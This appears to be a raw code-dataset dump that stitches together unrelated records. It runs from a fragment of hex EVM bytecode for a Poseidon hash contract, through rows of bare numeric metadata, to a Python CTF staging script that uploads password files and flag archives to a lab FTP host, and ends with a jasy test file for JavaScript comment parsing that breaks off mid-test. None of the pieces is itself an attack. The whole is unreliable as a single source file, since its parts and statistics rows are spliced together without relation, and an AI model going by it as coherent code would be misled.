893505083818180828009800909905062000f876000526200138c565b7f2739ce523e8ac7040f41978fcb09a61fc893f489a7ac63b7dc2b666a0450b8b78481830891508481840892508481850893505083818180828009800909905062000fd46000526200138c565b7f0dda954b88b4662b7228ea53dfc0035cf1c3e54a3eff951ed20eddf50abd007084818308915084818408925084818508935050838181808280098009099050620010216000526200138c565b7f06013c9903173cc6bf78d659ddc7ddde597add8f66b4adf14fd0fdd2aea80b42848183089150848184089250848185089350508381818082800980090990506200106e6000526200138c565b7f2a44a05caa05df06a56f318ae930c0f5b1238eff2cc641442940c42125e3b1d884818308915084818408925084818508935050838181808280098009099050620010bb6000526200138c565b7f14c09ffabca71eaed84af10167d78bb3e29f0bbbf2d4a7537e046b0b81a560c484818308915084818408925084818508935050838181808280098009099050620011086000526200138c565b7f142aaa6de3cf63bb4172a80f539bf5ecd9a42802d39bce5d3728e9bcde35a55a84818308915084818408925084818508935050838181808280098009099050620011556000526200138c565b7f06cea3644ef4942b5b898426b6c4845162e327a2ba7660cf2dca68f1ea3ab82a84818308915084818408925084818508935050838181808280098009099050620011a26000526200138c565b7f0fd2f28081191b6e436ee90785b22c924bc5936d6ff57c6e5d58f30a83dd463784818308915084818408925084818508935050838181808280098009099050620011ef6000526200138c565b7f1f138e07b3bd619267c920f1b52bf311de510f7b04b7c6575bc19dac05286c8584818308915084818408925084818508935050838181808280098009099050838281808280098009099150838381808280098009099250620012546000526200138c565b7f1f3a2010c0091c2bf3cdd2834b1480186f4e474b4178af042d82122a69ee1b6984818308915084818408925084818508935050838181808280098009099050838281808280098009099150838381808280098009099250620012b96000526200138c565b7f1a33927f88bde3319be2cc152435e2ca4b055462321224031404d350be0d03d4848183089150848184089250848185089350508381818082800980090990508382818082800980090991508383818082800980090992506200131e6000526200138c565b7f15aa17ff60cb072ec045ab101d2eaf64a7ad4cb59493994b4354eef81e7841bf848183089150848184089250848185089350508
38181808280098009099050838281808280098009099150838381808280098009099250620013836000526200138c565b60005260206000f35b8360205182098460405184098591088460605185098591088460805183098560a05185098691088560c05186098691088560e0518409866110005186098791088661120051870987910894509250905060005156"
poseidon_6_data="0x38600c600039611e5d6000f37c01000000000000000000000000000000000000000000000000000000006000350463c4420fb4146200002e57fe5b7f2a605eab3c12c29701b9a8944a16ff3d64c199efa7c857c65e4c0560ab3b0ca16020527f1f5b500f1c0f88bcca0d51538b1a787ccd014eeb3831cecc5752dbb1a5732e756040527f140c27dca8225f48f74d55391032c02a2677a34a51cf8f329b6b1a0076a186316060527f2435feebb56e56c96b4d8a90637235e4f769cca19ee5cc0e1c84b4f74490cee36080527f1cabef035d32194e6327ccafed62049f16340bd6522d0e0cfc04c1f3eb6cb8a460a0527f0809febd6b71b85af68e97b3a334b8240e138d95bdec10f96757b1972c74c70360c0527f25a8fb283934520d61862db42ab5fbbf21a13613f7e99cae00232a61959d468f60e0527f063052928cdf6319a5cb946c2becbe0e4ebc9cc6244c9903a123707e595ebcad611000527f057ccb8d91f4a1fa9e5039cf4f457e364f940cf575259be35c614030535293c6611200527f249e9f24440c84e77026b8e111f2e6ca6d124556505b4e5bd5215983b445cbec611400527f17250b02a83957b0d036d216114793fe53ef92d12ce1b91666546ac818e40c74611600527f075c1923454f6b1f87f00b238dbda2323e5ed5885a07d6681c8148aacbc32df8611800527f29f93e7ee3e09f10c2b577ab2056fa0b2694d164866d49122ce17818e2277ec1611a00527f1321691a1c7edf2cdabb0bd4558d82ff697277299f7fec56406566faefd20d24611c00527f022588e3bcf16d2f9583ff188e2455e4d77e570a01366b13c3b0e9d1cd3dea27611e00527f2ae7c8d8341fc04509d31c5c3caf7b182cbadd6e89bd80e2a8dd438740a1400c612000527f25b1e032d89662f0666956c34f323c344278f370e4ca56409d7acc9098797797612200527f0af9bf6e54a040be1910bcab732d2a5451e356c9b0e54f196bc962bfa37a5784612400527f2a101efc715f13fe15729e91c076536903f8718ffac65a04a1fff47e51ed0d6d612600527f141194b8fa596f801dcbd27cd0a1fa45aa8d7a1db367e8f495dc906962b60750612800527f0a8bef1519e2b7cc844b0714b71fe093a73334505b6b8e71d731aa1a6a63e9b2612a00527f0980e6aa5e105658acd1eddde95a92ffa1556f142a596b401f48395d47dc5a51612c00527f0f4461f42060b27d3b34a34d8a0a2d3d6a3d812f3756dcb19e5b04c689a83a5b612e00527f0a9346be53c2fa9f7907c52cbf7204de8c1c5dc8b90e2a800c6c1d290ae62c00613000527f23d3d70151df81f917113a847d8e61f4929b7edcc6ba0dfe6bd0116713834d61613200527f125bcfe7de4c761bea5cc5f06
d853f39840c8648e0e321d5ab7dc779252d32a6613400527f2cb31f422481e106c8cf448eaa6b61fe07544eff879951baefb03cb91dbc1e3e613600527f03c96fb68f083dfafb98c5e09181baf2f94dce618fbc78264bcc6ac102cd6f55613800527f1cbe64ac49aebf693279d246b2c8e257e99612512afdb30635f5b99ce579f92e613a00527f2375201a368412e3c2046d85fae310971047afe12b973a429b097e44843eef63613c00527f2185e429a96435c62e21e7091f4262685769e43fa49c9d40f88c41016c588ada613e00527f1d583a5b54b566e83a38a7667d0a979327e66a3bf403f589b5f24c617d6f1aee614000527f14d180bf4c3bb4c109918b8bed15f0f781bfec0e0d63bed877c5ba8d21d78184614200527f11c3c8fdf6c7cfa26046d59ad05834c854f7f4324fe53f4abfbc9437b3d13082614400527f2fd9287af078462bc14f7f1da959e7df7e9a1598b833d3e98cc3552456f8e985614600527f2ccb8565240997047bef4989cf92c3d2017eb0fa368b135d2d2941c13ddcd324614800527f30644e72e131a029b85045b68181585d2833e84879b9709143e1f593f000000160e43560c43560a4356084356064356044357f1fd4a35e68f0946f8f5dfd2ac9d7882ce2466ec1c9766f69b5a14c3f84a17be2878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990508682818082800980090991508683818082800980090992508684818082800980090993508685818082800980090994508686818082800980090995506200062960005262001cfd565b7f170118300987f2aa8128c6893a7691621b7dd210af7f412385f8d6663782490887818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050868281808280098009099150868381808280098009099250868481808280098009099350868581808280098009099450868681808280098009099550620006c460005262001cfd565b7f0b734ac64dd2198297d67aab5b9f2dd61ae0a5e169692c8802760c97c1b7b0ed878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990508682818082800980090991508683818082800980090992508684818082800980090993508685818082800980090994508686818082800980090995506200075f60005262001cfd565b7f1430e42a7b4242b4586f06e9885a444ea4920fac92e2dfbc3cc16ebc2bc341678781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905086828180828009800
9099150868381808280098009099250868481808280098009099350868581808280098009099450868681808280098009099550620007fa60005262001cfd565b7f2d03cefd44927bbfa58fb8a8f22a0686c99db6ea9673e5ae2e3f51016b4d7812878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200085960005262001cfd565b7f27a60ef60d51be502cad8248a0f6ddc28f49ce9e174032bb1a054503691a99b387818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050620008b860005262001cfd565b7f080a061bb2bc9ebb8c05ecf71fc842c7a09a85d48f5147fdd3bafc8d63a61801878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200091760005262001cfd565b7f0470cb196b0b31dcf0f998c08fd4a2d3784c84625d3d23cd9959c8df3d61a850878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200097660005262001cfd565b7f236a18fd797bcde8ceefd41745367450d80ecaf8fa5da304af8dd07d6c9c4a2f87818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050620009d560005262001cfd565b7f2da94346d74ec77c4e5f937d2d595070636e2fcdb9349ce0e2c789c9e9d41ae78781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000a3460005262001cfd565b7f278c16574216dd6780c4233d2e8bc1f90a76442f4fed1678d91a38f26a169f1d8781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000a9360005262001cfd565b7f0aba88ce0a5f3f57c82b73cc72d86f0182a5ebbf61236cf2d67e3903428f105c8781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000af260005262001cfd565b7f13d45f17ebd7bd267612d1c7d028c3ef2380ee77838b1809039156e45ea399da8781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000b5160005262001cfd565b7f2d7a5202c14dd920b8382ce02653223d81eeeba9e2a27473af50810482e01dd787818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099
05062000bb060005262001cfd565b7f245a0767c5b055812467f081108f7dfee5dcfc10f80079da8e941c77cc13db688781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000c0f60005262001cfd565b7f2c59e967a2d4ea6770593f65039451741d23b5da99dc8042070a39907478b66e8781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000c6e60005262001cfd565b7f24c85e48d7afe1001e8f66c6dd31213b4288933a0ad379864f16743df2c980038781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000ccd60005262001cfd565b7f227cd523af710c598ecab087c2843100f7a9738c3d488c007e428d91b1f337668781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000d2c60005262001cfd565b7f2559fff5296c533ad4c7c6e1c88b9c69980b197513e317db5402d492799eeb9f8781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000d8b60005262001cfd565b7f02a601bfc4da9459e9718fe6b926c0e175e63aa2217abf643dc9e0757d7ef1548781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000dea60005262001cfd565b7f0da58042d5874668e8e0f3a278dfc8c8b08ccfbf5b4257ed2832affb60cb41128781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000e4960005262001cfd565b7f2e6fdd26eac7bf454187dee626ab4b3f421739e8318796503f16da5691f1bed98781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000ea860005262001cfd565b7f21be0174899457628eb771a9505580d1e4ef36ffb502219a2f43351b18d2784e8781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000f0760005262001cfd565b7f2133b63278501b60e86883b00a54619ccf4a7cf07702dea240f53b19005f5a368781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000f6660005262001cfd565b7f21841c731a220c4817edefba29768e949c0b519bb8e320fab91d0c18a102bc1887818
30891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000fc560005262001cfd565b7f18b6901831fde10bda86893ae8cbd9f9da5af120dc44c89f5152926c28f2ed2f878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200102460005262001cfd565b7f2ec53e23654ad18aca5c584b2eac05eb7d4db203b23ca6620ec475a8795d4202878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200108360005262001cfd565b7f2c939494de2138a2ca5e19ce4b67cdffce49ed1107248aa5edb6e12c7d28df7787818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050620010e260005262001cfd565b7f0623ee7891199514435ad1ff285fb74fd43a7bb0dae62dbbdb36aff96e508972878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200114160005262001cfd565b7f22c8292e61a9bddf3d205cb50a7a4d29b06c431e53ec8fbaad8a73dd4104c64a87818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050620011a060005262001cfd565b7f0d51b55ec1f59f569076ecff66ba152b07679bc50dad6cd703b46b95e1cbd7e287818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050620011ff60005262001cfd565b7f27154bbfb0588b6f36300701b00213556cb869bb368c63d1ded2a8416e273c0d878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200125e60005262001cfd565b7f17b1370ccffe479909b0c1f7dc671b344494342940019105b90562cc4228eb5c87818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050620012bd60005262001cfd565b7f20ff783c31f906b9d0a4ae973600ee91e99e4565100c310065c27d0127059074878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200131c60005262001cfd565b7f13c45ba44e91db74e719b45a15914640283f1db32e1a4304667bcf67230c615b878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200137
b60005262001cfd565b7f29cfab68a5620b3760e361caac37294ec856607f2729f2403af22ae485fe48ba87818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050620013da60005262001cfd565b7f1380cf7791392e856692cd802e0820e89d319fe8b262dffb8abd00cc83d10f27878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200143960005262001cfd565b7f2d9d9fdcac77dd461f1b159edc18eac9e53a01172733e042fe4ab39f76d4939b878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200149860005262001cfd565b7f0028701c995d998357f61aae3b02a6764caf807a024ba0478965be12256d62a087818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050620014f760005262001cfd565b7f06268de0019eb6197fd8b34ca05a250aa2215a169f66b89acc7c70bbbdd26591878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200155660005262001cfd565b7f1b8191c81911bb23fd08d9f32c9cfc39d498d937c2cf2b4a286ce463f735e1b587818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050620015b560005262001cfd565b7f05a7f29c502bbc907f811b53e6901a4598539d0b2404c2c0f998bdc51d877216878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200161460005262001cfd565b7f164d0f7cbcdfd7c008c3ad541f1eb04374cdce427af07abbd20abb3c5f47e322878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200167360005262001cfd565b7f096f6dad4af11aef93cd170b131dc5ca907f1554edb860a2183b8f387bbfc49387818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050620016d260005262001cfd565b7f0aef194b2253cc03deb323029aa3d280cfc3bba70dbe35ebc76c4e5efb28f44c878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200173160005262001cfd565b7f2739ce523e8ac7040f41978fcb09a61fc893f489a7ac63b7dc2b666a0450b8b7878183089150878
184089250878185089350878186089450878187089550878188089650508681818082800980090990506200179060005262001cfd565b7f0dda954b88b4662b7228ea53dfc0035cf1c3e54a3eff951ed20eddf50abd007087818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050620017ef60005262001cfd565b7f06013c9903173cc6bf78d659ddc7ddde597add8f66b4adf14fd0fdd2aea80b42878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200184e60005262001cfd565b7f2a44a05caa05df06a56f318ae930c0f5b1238eff2cc641442940c42125e3b1d887818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050620018ad60005262001cfd565b7f14c09ffabca71eaed84af10167d78bb3e29f0bbbf2d4a7537e046b0b81a560c4878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200190c60005262001cfd565b7f142aaa6de3cf63bb4172a80f539bf5ecd9a42802d39bce5d3728e9bcde35a55a878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200196b60005262001cfd565b7f06cea3644ef4942b5b898426b6c4845162e327a2ba7660cf2dca68f1ea3ab82a87818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050620019ca60005262001cfd565b7f0fd2f28081191b6e436ee90785b22c924bc5936d6ff57c6e5d58f30a83dd46378781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062001a2960005262001cfd565b7f1f138e07b3bd619267c920f1b52bf311de510f7b04b7c6575bc19dac05286c858781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062001a8860005262001cfd565b7f1f3a2010c0091c2bf3cdd2834b1480186f4e474b4178af042d82122a69ee1b698781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905086828180828009800909915086838180828009800909925086848180828009800909935086858180828009800909945086868180828009800909955062001b2360005262001cfd565b7f1a33927f88bde3319be2cc152435e2ca4b055462321224031404d350be0
d03d48781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905086828180828009800909915086838180828009800909925086848180828009800909935086858180828009800909945086868180828009800909955062001bbe60005262001cfd565b7f15aa17ff60cb072ec045ab101d2eaf64a7ad4cb59493994b4354eef81e7841bf8781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905086828180828009800909915086838180828009800909925086848180828009800909935086858180828009800909945086868180828009800909955062001c5960005262001cfd565b7f16742ccf030b475a60958dc351e00eb04c088b74d90ba19cd0dc52ff1d8f71788781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905086828180828009800909915086838180828009800909925086848180828009800909935086858180828009800909945086868180828009800909955062001cf460005262001cfd565b60005260206000f35b8660205182098760405184098891088760605185098891088760805186098891088760a05187098891088760c05188098891088760e0518309886110005185098991088861120051860989910888611400518709899108886116005188098991088861180051890989910888611a0051840989611c005186098a910889611e005187098a9108896120005188098a9108896122005189098a910889612400518a098a9108896126005185098a6128005187098b91088a612a005188098b91088a612c005189098b91088a612e00518a098b91088a613000518b098b91088a6132005186098b6134005188098c91088b6136005189098c91088b613800518a098c91088b613a00518b098c91088b613c00518c098c91088b613e005187098c6140005189098d91088c614200518a098d91088c614400518b098d91088c614600518c098d91088c614800518d098d91089a509850965094509250905060005156" | 8,604.666667 | 15,590 | 0.99969 | 8 | 25,814 | 3,225.25 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.824733 | 0.000077 | 25,814 | 3 | 15,590 | 8,604.666667 | 0.17488 | 0 | 0 | 0 | 0 | 0 | 0.998489 | 0.998489 | 0 | 1 | 0.998489 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 1 
| 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
b82cf1b63aacee9bd2651c4fb9444bb625d0bd34 | 1,285 | py | Python | introduction/network/clpwn-net-ctf/ctf-management/a_rot_of_txt.py | 4ensiX/my-ctf | fcd60e1e0a2ee89688666155c931e9c55572a2c0 | [
"MIT"
] | null | null | null | introduction/network/clpwn-net-ctf/ctf-management/a_rot_of_txt.py | 4ensiX/my-ctf | fcd60e1e0a2ee89688666155c931e9c55572a2c0 | [
"MIT"
] | null | null | null | introduction/network/clpwn-net-ctf/ctf-management/a_rot_of_txt.py | 4ensiX/my-ctf | fcd60e1e0a2ee89688666155c931e9c55572a2c0 | [
"MIT"
] | null | null | null | import pathlib
from ftplib import FTP
# Anonymous FTP login to the CTF host.
ftp = FTP(
    "10.10.10.5",
    "anonymous",
    passwd=""
)

# Read the upload file names and their matching passwords.
with open("filename.list") as fnames:
    fn = fnames.readlines()
with open("password.list") as plist:
    pwd = plist.readlines()

# Each index range of password files shares one flag archive.
groups = [
    (range(0, 12), "../flag1-1/flag.zip"),
    (range(12, 35), "../flag2-1/flag.zip"),
    (range(35, 50), "../flag3-1/flag.zip"),
]
for indices, flag_path in groups:
    for i in indices:
        name = fn[i].rstrip('\n') + ".txt"
        # Write the password locally, then upload the text file over FTP.
        pathlib.Path(name).write_text(pwd[i])
        with open(name, "rb") as uf:
            ftp.storlines("STOR " + name, uf)
    # Upload the flag archive for this group (the remote name is the same each time).
    with open(flag_path, "rb") as ff:
        ftp.storbinary("STOR flag.zip", ff)
ftp.quit()
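The name-building step in the loops above strips the trailing newline that `readlines()` keeps on each entry before appending `.txt`. A minimal sketch of that transformation, using hypothetical list entries:

```python
# Hypothetical entries, as readlines() would return them from filename.list;
# note the final line of a file may arrive without a trailing newline.
entries = ["alpha\n", "beta\n", "gamma"]
names = [e.rstrip('\n') + ".txt" for e in entries]
print(names)  # → ['alpha.txt', 'beta.txt', 'gamma.txt']
```

Using `rstrip('\n')` rather than `strip()` preserves any intentional leading or trailing spaces in the names while still removing the line terminator.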
| 23.363636 | 61 | 0.538521 | 209 | 1,285 | 3.311005 | 0.229665 | 0.052023 | 0.156069 | 0.17341 | 0.768786 | 0.74711 | 0.74711 | 0.74711 | 0.74711 | 0.74711 | 0 | 0.021842 | 0.180545 | 1,285 | 54 | 62 | 23.796296 | 0.635328 | 0 | 0 | 0.585366 | 0 | 0 | 0.199187 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.04878 | 0.04878 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b841aa59b1d368e904ab7bdfad0c56ad9a32af9d | 55,404 | py | Python | jasy/test/js/comments.py | zynga/jasy | 8a2ec2c2ca3f6c0f73cba4306e581c89b30f1b18 | [
"MIT"
] | 16 | 2015-01-02T19:05:06.000Z | 2020-08-20T14:55:15.000Z | jasy/test/js/comments.py | zynga/jasy | 8a2ec2c2ca3f6c0f73cba4306e581c89b30f1b18 | [
"MIT"
] | 30 | 2019-01-02T16:30:14.000Z | 2019-01-02T16:31:12.000Z | jasy/test/js/comments.py | zynga/jasy | 8a2ec2c2ca3f6c0f73cba4306e581c89b30f1b18 | [
"MIT"
] | 4 | 2015-05-17T21:51:44.000Z | 2020-08-20T14:55:17.000Z | #!/usr/bin/env python3
import sys, os, unittest, logging
# Extend PYTHONPATH with local 'lib' folder
if __name__ == "__main__":
jasyroot = os.path.normpath(os.path.join(os.path.abspath(sys.argv[0]), os.pardir, os.pardir, os.pardir, os.pardir))
sys.path.insert(0, jasyroot)
print("Running from %s..." % jasyroot)
import jasy.js.parse.Parser as Parser
class Tests(unittest.TestCase):
def process(self, code):
node = Parser.parse(code)
return node
#
# SINGLE COMMENTS
#
def test_single(self):
parsed = self.process('''
// Single Comment
singleCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "single")
self.assertEqual(parsed[0].comments[0].text, "Single Comment")
def test_single_unbound(self):
parsed = self.process('''
// Single Comment
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
self.assertEqual(parsed.comments[0].variant, "single")
self.assertEqual(parsed.comments[0].text, "Single Comment")
def test_single_unbound_nobreak(self):
parsed = self.process('''// Single Comment''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
self.assertEqual(parsed.comments[0].variant, "single")
self.assertEqual(parsed.comments[0].text, "Single Comment")
def test_single_two(self):
parsed = self.process('''
// Single1 Comment
// Single2 Comment
singleCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 2)
self.assertEqual(parsed[0].comments[0].variant, "single")
self.assertEqual(parsed[0].comments[0].text, "Single1 Comment")
self.assertEqual(parsed[0].comments[1].variant, "single")
self.assertEqual(parsed[0].comments[1].text, "Single2 Comment")
#
# SINGLE COMMENTS :: CONTEXT
#
def test_single_context_inline(self):
parsed = self.process('''singleCommentCmd(); // Single Inline Comment''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "single")
self.assertEqual(parsed[0].comments[0].context, "inline")
def test_single_context_block_before(self):
parsed = self.process('''
singleCommentCmd();
// Single Block Comment
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "single")
self.assertEqual(parsed[0].comments[0].context, "block")
def test_single_context_block_after(self):
parsed = self.process('''
// Single Block Comment
singleCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "single")
self.assertEqual(parsed[0].comments[0].context, "block")
def test_single_context_section(self):
parsed = self.process('''
// Single Section Comment
singleCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "single")
self.assertEqual(parsed[0].comments[0].context, "section")
#
# MULTI COMMENTS
#
def test_multi(self):
parsed = self.process('''
/* Multi Comment */
multiCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "multi")
self.assertEqual(parsed[0].comments[0].text, "Multi Comment")
def test_multi_unbound(self):
parsed = self.process('''
/* Multi Comment */
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
self.assertEqual(parsed.comments[0].variant, "multi")
self.assertEqual(parsed.comments[0].text, "Multi Comment")
def test_multi_unbound_nobreak(self):
parsed = self.process('''/* Multi Comment */''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
self.assertEqual(parsed.comments[0].variant, "multi")
self.assertEqual(parsed.comments[0].text, "Multi Comment")
def test_multi_two(self):
parsed = self.process('''
/* Multi Comment1 */
/* Multi Comment2 */
multiCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 2)
self.assertEqual(parsed[0].comments[0].variant, "multi")
self.assertEqual(parsed[0].comments[0].text, "Multi Comment1")
self.assertEqual(parsed[0].comments[1].variant, "multi")
self.assertEqual(parsed[0].comments[1].text, "Multi Comment2")
def test_multi_multiline(self):
parsed = self.process('''
/* Multi
Comment
Test */
multiCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "multi")
self.assertEqual(parsed[0].comments[0].text, " Multi\n Comment\n Test")
def test_multi_multiline_otherbreaks(self):
parsed = self.process('''
/*
Multi
Comment
Test
*/
multiCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "multi")
self.assertEqual(parsed[0].comments[0].text, " Multi\n Comment\n Test")
#
# MULTI COMMENTS :: CONTEXT
#
def test_multi_context_inline(self):
parsed = self.process('''multiCommentCmd(); /* Multi Inline Comment */''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "multi")
self.assertEqual(parsed[0].comments[0].context, "inline")
def test_multi_context_inline_multiline(self):
parsed = self.process('''
multiCommentCmd(); /*
Multi Inline Comment
*/''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "multi")
self.assertEqual(parsed[0].comments[0].context, "inline")
def test_multi_context_block_before(self):
parsed = self.process('''
multiCommentCmd();
/* Multi Block Comment */
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "multi")
self.assertEqual(parsed[0].comments[0].context, "block")
def test_multi_context_block_after(self):
parsed = self.process('''
/* Multi Block Comment */
multiCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "multi")
self.assertEqual(parsed[0].comments[0].context, "block")
def test_multi_context_section(self):
parsed = self.process('''
/* Multi Section Comment */
multiCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "multi")
self.assertEqual(parsed[0].comments[0].context, "section")
#
# PROTECTED COMMENTS
#
def test_protected(self):
parsed = self.process('''
/*! Protected Comment */
protectedCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "protected")
self.assertEqual(parsed[0].comments[0].text, "Protected Comment")
def test_protected_newline(self):
parsed = self.process('''
/*!
Protected Comment
*/
protectedCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "protected")
self.assertEqual(parsed[0].comments[0].text, "Protected Comment")
def test_protected_jquery(self):
parsed = self.process('''
/*!
* jQuery JavaScript Library v@VERSION
* http://jquery.com/
*
* Copyright 2011, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Sizzle.js
* http://sizzlejs.com/
* Copyright 2011, The Dojo Foundation
* Released under the MIT, BSD, and GPL Licenses.
*
* Date: @DATE
*/
''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed.comments, list)
